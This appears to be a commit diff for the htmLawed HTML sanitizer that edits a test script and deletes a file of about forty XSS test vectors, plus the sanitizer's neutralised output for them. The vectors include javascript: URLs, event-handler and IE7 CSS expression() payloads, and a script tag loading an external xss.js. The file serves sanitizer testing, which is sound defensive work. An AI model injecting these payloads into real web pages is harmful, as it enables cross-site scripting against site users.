||||||
|
Output code »
|
||||||
|
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>
|
|
@ -2,4 +2,4 @@
|
||||||
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
|
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
|
||||||
node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
|
node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
|
||||||
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
|
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
|
||||||
nodejs htmLawed-test.js test_xss.txt
|
nodejs htmLawed-test.js
|
||||||
|
|
42
test_php.htm
42
test_php.htm
|
@ -1,42 +0,0 @@
|
||||||
<img alt="<img onmouseover=confirm(1)//" src="src" />
|
|
||||||
'';!--"=&{()}<br />
|
|
||||||
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
|
|
||||||
<img src="denied:javascript:alert('xss');" alt="image" /><br />
|
|
||||||
<img src="denied:java script:alert('xss');" alt="image" /><br />
|
|
||||||
<img src="denied:javascript:alert('XSS')" alt="image" /><br />
|
|
||||||
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
|
|
||||||
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
|
|
||||||
<br />
|
|
||||||
<br />
|
|
||||||
<br />
|
|
||||||
<!--[if gte IE 4]>alert('xss');<![endif]--><br />
|
|
||||||
" src="http://ha.ckers.org/xss.js"><br />
|
|
||||||
<strong>Bad in PHP version without safe:</strong> " ";alert(window.location.href);//><br />
|
|
||||||
<br />
|
|
||||||
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
|
|
||||||
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
|
|
||||||
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss("*/ ");xss:ex XSS*/ /pression(alert("XSS"))">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="xss:e #48;078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
|
|
||||||
</span>
|
|
44
test_xss.txt
44
test_xss.txt
|
@ -1,44 +0,0 @@
|
||||||
<img alt="<img onmouseover=confirm(1)//"<"">
|
|
||||||
'';!--"<xss>=&{()}<br />
|
|
||||||
<img src="javascript%3Aalert('xss');" /><br />
|
|
||||||
<img src="javascript:alert('xss');" /><br />
|
|
||||||
<img src="java script:alert('xss');" /><br />
|
|
||||||
<img
|
|
||||||
src=javascript:alert('XSS') /><br />
|
|
||||||
<font color='#FF6699"onmouseover="alert(1)//'>test</font>
|
|
||||||
<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'>
|
|
||||||
<div style="javascript:alert('xss');"></div><br />
|
|
||||||
<div style="background-image:url(javascript:alert('xss'));"></div><br />
|
|
||||||
<div style="background-image:url("javascript:alert('xss')" );"></div><br />
|
|
||||||
<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
|
|
||||||
<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
|
|
||||||
<strong>Bad in PHP version without safe:</strong> <script a=">" ";alert(window.location.href);//></script><br />
|
|
||||||
<div style="background-image: url('js:xss')"></div><br />
|
|
||||||
<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert
|
|
||||||
%28%27xss%3f%29%29">x</a><br />
|
|
||||||
<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a>
|
|
||||||
<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>x</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="background:Expre\ssion(alert('xss'));">hi</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="background:expre\ssion(alert('xss'));">hi</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="xss:e\0078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
|
|
||||||
<strong>Bad IE7:</strong> <a style="background:url('java
|
|
||||||
script:eval(document.all.mycode.expr)')">hi</a><br />
|
|
Loading…
Reference in New Issue